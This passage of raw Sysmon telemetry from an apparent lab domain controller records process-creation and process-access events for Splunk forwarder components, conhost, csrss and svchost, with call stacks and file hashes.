Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007872Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.911{10ACEC4A-85F6-5FCF-5901-000000009101}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007871Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.395{10ACEC4A-85F6-5FCF-5801-000000009101}49525068C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007870Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.238{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85F6-5FCF-5801-000000009101}4952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007869Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.238{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007868Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.238{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007867Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.238{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007866Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.238{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007865Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.238{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007864Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.238{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007863Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.238{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007862Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.238{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007861Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.238{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007860Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.238{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85F6-5FCF-5801-000000009101}4952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007859Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.238{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85F6-5FCF-5801-000000009101}4952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007858Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.239{10ACEC4A-85F6-5FCF-5801-000000009101}4952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007900Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:07.488{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85F7-5FCF-5A01-000000009101}4960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007899Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:07.488{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007898Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:07.488{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007897Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:07.488{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007896Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:07.488{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007895Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:07.488{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007894Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:07.488{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007893Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:07.488{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007892Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:07.488{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007891Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:07.488{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007890Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:07.488{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85F7-5FCF-5A01-000000009101}4960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007889Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:07.488{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85F7-5FCF-5A01-000000009101}4960C:\Program 